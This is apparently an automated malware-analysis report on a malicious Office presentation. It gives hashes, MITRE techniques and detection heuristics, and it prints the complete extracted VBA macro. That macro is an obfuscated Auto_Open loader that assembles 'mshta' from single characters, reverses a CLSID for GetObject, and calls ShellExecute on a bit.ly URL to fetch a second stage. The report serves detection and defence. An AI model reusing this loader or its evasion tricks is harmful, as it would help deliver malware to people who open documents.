Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 91c3adccf9e8b7de…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 10.4 KB
First seen: 2021-06-13
MD5: 5b8e444cc2753a3701fbacf030dc3121
SHA-1: 774af9cdd89ea4924242737209616056882fc56a
SHA-256: 91c3adccf9e8b7de1e5ffb86b25e2a871cb51e99568a1f342135f39568940b75
Risk score: 172

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1218.005 System Binary Proxy Execution: Mshta

The sample contains VBA macros with an Auto_Open subroutine (spelled AutO_opEn, with every statement split by line continuations) that attempts to execute a payload. The script reassembles the string 'mshta' from single-character literals, obtains a COM object through GetObject with a 'new:' CLSID moniker that is stored reversed in the source, and calls that object's ShellExecute method with 'mshta' and a bit.ly URL, most likely to download and run a second-stage payload. The VBA project part was also renamed to evade detection.

Heuristics (7)

  • VBA project inside OOXML [medium, 4 related findings] (OOXML_VBA)
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/zaq.bin)
  • Dangerous API name reassembled from split string literals [critical] (OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched lines in script:
      . _
      ShellExecute@ _
      NamakBora _
  • VBA project part renamed to evade filename detection [high] (OOXML_VBA_PROJECT_RENAMED)
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
    Matched lines in script:
      = _
      GetObject _
      (StrReverse _
  • Auto_Open macro [low] (OLE_VBA_AUTO)
    Auto_Open macro
    Matched lines in script:
      Sub _
      AutO_opEn _
      ()
  • VBA project is signed but not by a recognised publisher [info] (VBA_SIGNED_UNTRUSTED)
    The VBA project carries a digital signature, but the signer does not chain to a recognised code-signing publisher/CA (self-signed, unknown issuer, or unparseable). A signature alone is not evidence of benignity — malware is routinely self-signed or signed with stolen certificates.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://www.bitly.com/asahdjiaiaawn (found in document text: OOXML body / shared strings)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1273 bytes
SHA-256: 10cfdeec59a1b8fc7a5aff364b13dec2e2905469efed3ed1dcc66220168ef7cf
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub _
AutO_opEn _
()

Dim _
bora _
As _
New _
Class1

Dim _
NamakBora _
, _
lora _
As _
String
NamakBora _
= _
bora _
. _
getEnumName _
(1)
lora _
= _
bora _
. _
getEnumName _
(2)
lora2 _
= _
bora _
. _
getEnumName _
(2)


bora _
. _
myvalue _
. _
ShellExecute@ _
NamakBora _
, _
lora2

End _
Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum

    myname1 = 1
    myname2 = 2
    myname3 = 3
    myname4 = 4
    
    End Enum
    
Public _
Function _
getEnumName _
(eValue As myenum)
Select _
Case _
eValue
    Case _
    1
        getEnumName _
        = _
        "m" + "s" + "h" + "t" + "a"
    Case _
    2
        getEnumName _
        = _
        "https://www.bitly.com/asahdjiaiaawn"
    End _
    Select
End _
Function


Public _
Function _
myvalue _
()
Set _
myvalue _
= _
GetObject _
(StrReverse _
("000045355444-E94A-EC11-972C-02690731:wen") _
)
End _
Function
vbaProject_00.bin | vba-project | OOXML VBA project: ppt/zaq.bin | 18944 bytes
SHA-256: 99a22d9f82db394d6d3d1908449ff9b6f1299bc381490e0b65502e18fe171535
vbaProject_01.bin | vba-project | OOXML VBA project: ppt/vbaProjectSignature.bin | 1928 bytes
SHA-256: 804e986db30fcf186f7da4b6520ca60192c84e08716f7ef53def03a3ec443c8e